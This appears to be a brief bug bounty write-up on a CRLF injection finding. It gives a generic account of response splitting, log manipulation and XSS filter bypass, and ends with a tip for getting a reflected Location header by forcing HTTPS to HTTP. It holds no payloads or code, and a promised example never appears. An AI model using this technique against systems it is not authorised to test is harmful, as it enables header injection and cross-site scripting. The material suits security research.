Bug Name :- CRLF-I Bug Priority :- Low Bounty :- $250 + $50
In a CRLF injection attack, the attacker inserts the carriage return and linefeed characters into user input to trick the server, the web application, or the user into thinking that an object has terminated and another one has started. While CRLF sequences are not malicious characters in themselves, they can be used with malicious intent, for example for HTTP response splitting.
In web applications, a CRLF injection can have a severe impact, depending on what the application does with the request blocks. Consequences can range from information disclosure to code execution, a direct impact web application security vulnerability. In fact, a CRLF injection attack can have very serious repercussions on a web application, even though it was never listed in the OWASP Top 10 list. Let's look at an example that shows how to use CRLF injection to manipulate log files in an admin panel.
The impact of CRLF injections varies depending on the attack context, but will typically cover all the consequences of cross-site scripting and information disclosure that the injection allowed. The technique can also be used to deactivate certain security restrictions like XSS filters and same-origin policy in the victim's browser, paving the way for other malicious attacks.
Always try to force the server HTTPS to HTTP so it can automaticaly add Location response header with requested url For me i created a automated script to identify which is available in my github